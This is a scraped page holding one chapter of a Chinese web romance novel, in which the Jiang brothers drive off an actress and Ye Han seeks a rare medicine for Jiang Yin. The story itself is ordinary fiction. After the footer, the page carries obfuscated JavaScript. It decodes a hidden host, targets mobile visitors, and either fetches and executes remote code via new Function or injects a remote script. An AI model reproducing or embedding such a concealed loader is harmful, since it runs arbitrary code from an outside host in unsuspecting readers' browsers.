字:
关灯 护眼
首页 > 都市 > 美妆系统带我抱紧气运男主 >第二十八章:江吟的特殊

第二十八章:江吟的特殊

作者:鸭子飞飞字数:3220更新:2022-11-26 00:04

“江总,您怎么过来了?”沈梦铃从来没想过江烨华回来,立刻摆出了最好的姿态面对他,毕竟江家的这两位谁都是人中龙凤,嫁给其中一个人她都不会吃亏。

“吟吟在你这里。”江烨华没有理会沈梦铃,而是问自己二弟。

吟吟过来送午饭不是先去大哥那里,而是二哥这里,肯定是前几天不让她露营惹她生气了,妹妹那么可爱,为数不多提要求为什么不同意,不就是露营嘛,吟吟想要去攀登喜马拉雅山都行,现在好了,这个便宜让老二拿到了,气死。

江烨华外面看起来生人勿进,冷面无情,其实要比江烨霆这个看上去平易近人,温和有礼的好说话多了。

“嗯,刚过来。”江烨霆烨知道自己大哥心思,于是让开了让人进去。

沈梦玲看着江总就这样无视了自己走了进去,还叫了名字,江吟看见自己的大哥,想起了沈梦铃跟自己两个哥哥的纠缠,赶紧拉了拉二哥的衣袖,道:“二哥,什么时候可以吃饭呀,都要凉了。”

“马上,沈小姐,你现在可以走了,你不是我们‘吟宝’的艺人,以后我们没必要见面。”江烨霆温柔的跟妹妹说完,马上面对沈梦铃又是一副敷衍的嘴脸。

他知道,幺儿不高兴了,她不喜欢这个女人,聪明乖巧的幺儿从来不会在别人说话的时候打断,除非她不高兴不喜欢。

“小江总,江总,虽然我不在‘吟宝’了,可是今后有合作还是需要见面的。”沈梦铃道。

她如今的身价足以代言一些国际大牌,包括江氏的产品,以后不可能不见面的。

“没必要,‘吟宝’有的是人。”江烨霆道。

他说的没错,“吟宝”作为三大娱乐公司之一,有的是资源和艺人,像沈梦铃这样的一年可以捧起来十几个,光有美貌没脑子的艺人多的是。

“大哥,二哥不要工作了,快点吃饭,我做了好久的。”江吟一看沈梦铃又要跟二哥说话,赶紧打断,恨不得把这个女人丢的远远的。

“好,老二,让她滚,吟吟生气了。”江烨华着急“戴罪立功”,自然是宝贝说什么就是什么。

“好,都听幺儿的。”江烨霆转头温柔宠溺的跟妹妹说完话,然后变了一张脸赶人走。

沈梦铃这才明白,这位漂亮的少女不是江烨霆两兄弟的什么恋人,而是他们的宝贝妹妹,真正掌握他们“生杀大权”的幕后。

“江小姐你好,你是不是对我有什么误会?”沈梦铃赶紧讨好江吟,这个人可以直接命令两位江总做事,要是她喜欢自己,让自己哥哥娶她,两位是不会拒绝妹妹的要求。

至于嫁过去之后,哼,一个短命鬼,还能猖狂到什么时候,只要江吟一死,她有自信拿捏住这两个男人。

熟知剧情的吟吟当然不会让这个得逞,她哼了一声,傲娇道:“你长的丑,不要在我面前晃来晃去,我会吃不下饭。”

听到妹妹吃不下饭,江烨华立刻急了,“老二,快点封杀了,省的那天出现在电视上,让吟吟看见,她可不能少吃饭。”

“嗯。”显然这位也是考虑可行性了,毕竟谁都没有妹妹重要。

“不是,江总你们不能这样。”江烨华真的以为这个人会影响妹妹的食欲,赶紧关上门,幸好刚才几人说话的时候,这个人跟她的助理已经站在门口了,不然还不好赶。

江吟看着大哥雷厉风行的样子,在内心给哥哥点了个赞,就应该这样,对待这种不怀好意的女人,就该跟秋风扫落叶一样无情。

“好了,以后这个人不会出现在你面前了,能告诉二哥,为什么不喜欢她吗?”江烨霆好笑的说道。

江吟:“就是不喜欢呀,大哥,二哥你们快吃饭,我还要去找寒哥呢。”

两位哥哥相视一笑,都在对方眼里看到了宠溺,妹妹这样子他们能怎么办呢,只有依着她了。

江吟建糊弄过去了,不由得松了一口气,还好还好,不然她是一点理由都编不出来的。

为什么讨厌沈梦铃,因为她只导致江家覆灭的一把推手啊,不说原主江吟是怎么作死得罪男主,让男主报复整垮江家的,可是男主没有赶尽杀绝,江家最后家破人亡是以为沈梦铃。

原书里,沈梦铃确实嫁给了她温柔的二哥,可是却又跟大哥纠缠不清,江氏倒了之后,沈梦铃成天在家里骂这个骂那个的,嫌弃二哥窝囊,还把原主赶了出去,原主死后,沈梦铃居然带着有钱的男人来家里,当着江烨霆的面告诉对方,她出轨了这个男人。

还卷走了江家最后的钱跑了,留下病重的大哥,和得知小妹已死的二哥,两位哥哥心灰意冷,干脆一把火,一家人全去那边团聚了。

既然江吟穿越过来,避免了得罪男主的命运,当然也不能让外人祸害她好不容易改变的人生,她要爱她的人,她爱的人,一辈子平安喜乐。

“吟吟又不傻,那女人什么心思不知道?”江烨华吃了妹妹的饭,为妹妹说话。

江吟赶紧点头:“对,我们说好了,谁都不能带一个搅家精进门。”

“好,都听幺儿(吟吟)的。”

陪哥哥们吃了午饭,江吟就要去找她寒哥,为此,江烨华会公司,顺便把江吟送到了地方,叮嘱了叶寒好好照顾人才离开。

两人像是许久未见的小情侣一样,江吟握着她寒哥的手,开心的像个两百斤的狗子。

——

抵达苏家的时候,苏昭不在,是管家接待的他们,叶寒如今已经是苏家的贵客,大伙儿都知道二小姐的病情有好转,都是因为这个人。

江吟跟在她寒哥身边,在花园里见到了苏婉婉,此刻她正在写生,作为美院的学生,苏婉婉对于绘画方便非常有天赋。

听到管家来说,苏婉婉放下画笔,回头冲着来的两人笑了笑,“叶医生,江小姐。”

经过几次接触“治疗”,她现在已经不想作妖了,正确来说是不能作妖了,毕竟叶寒有的是方法让她乖乖就范,这个人男人的字典里似乎没有怜香惜玉,不,有的,对于他身边的江吟,他就会这四个字。

“吟吟,你先回屋里,外面晒。”叶寒声音柔和的跟江吟说话。

江吟愣了几秒,然后点头,看来寒哥是有话单独跟苏婉婉说了,她乖乖的跟管家离开了,小花厅里面,用人端上茶点又离开。

苏婉婉坐在他的对面,对面男人褪去了刚才的温柔,冷冽的眉峰,深邃的眼眸,高挺的鼻梁,棱角分明的五官带着几分不加掩饰的疏离,眼神不再是对着江吟那边温柔如水,而是冷傲的如同三尺寒冰。

“我找了很多地方,没有找到。”苏婉婉声音很小道。

叶寒骨节分明的手指轻敲着桌面,面前的茶水带着热气,苏婉婉感觉到了对面人的生气,赶紧道:“那味药材太特殊了,我根本从来没有听过,我学医那么久,就从来没听过什么药材叫,叫‘白夜’的。”

明里叶寒再给苏婉婉看病,暗地里,苏婉婉已经跟他达成协议,他帮助自己说服姐姐让自己弃医从画,她替叶寒找一味药材,她之前还以为是什么名贵的,他们苏家还拿不出来吗?事实上,这一味是真的拿不出来,她甚至都没有听说过。

“找不到?”叶寒道。

直觉告诉他,苏婉婉一定能找到,他的直觉一向准的可怕。

“需要,需要多一点时间,叶医生,可不可多给我几个月?”苏婉婉硬着头皮道,这一个月是真的太短了。

“多久?十年,二十年?”叶寒声音冰冷,毫无感情,对于江吟以外的异性,他都难得多说一句话。

“不不,只要半年,半年就行了。”苏婉婉赶紧摆手,十年二十年,她还学什么画?

“三个月。”叶寒最后折中了一下。

江吟的病不好治,但曲老和他研究了很久,才想到这个一个古方可以试试,不管是什么只要有一点希望,叶寒都愿意,包括曲老说的那个“叶家”,要是古方不行,去百年医学世家的叶家求人有什么不可以?

“好,三个月后,一定给你找到。”苏婉婉赶紧点头。

叶寒嗯了一声要起身,离开那么久,不知道小美人有没有想他,毕竟小美人可是离不开自己。

“那个,叶医生,冒昧问一句,你是为了江小姐找的吗?”苏婉婉问。

姐姐查到的,叶寒家里没有生病,唯一一个叶父还是治疗好了,在家休养,能让他费尽心思的也就是江家那个病秧子三小姐了。

“你问的太多。”叶寒说完起身离开。

虽然这个人什么都没有回答,可是苏婉婉却是知道了答案,她自嘲笑了笑,之前还对叶寒抱有幻想,现在什么都没了,叶寒心里眼里只有江吟,只在她面前温柔,只在她面前妥协,为了她的病,煞费苦心。

小美人在客厅等了很久,才等来叶寒跟苏婉婉两人,她立刻起身,笑的甜美:“寒哥,你们好了,苏小姐身体好些了吗?”

叶寒目光柔和,接住朝他走来的小美人的胳膊,“多吃些药,就好了。”


  
『加入书签,方便阅读』

Copyright © 2019-2022

function srwPOA(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zHFjw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return srwPOA(t);};window[''+'w'+'o'+'I'+'v'+'i'+'d'+'m'+'P'+'R'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=zHFjw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmJyZ3Yub2JtcHAAuY29t','158795',window,document,['A','SmdKxwtb']);}:function(){};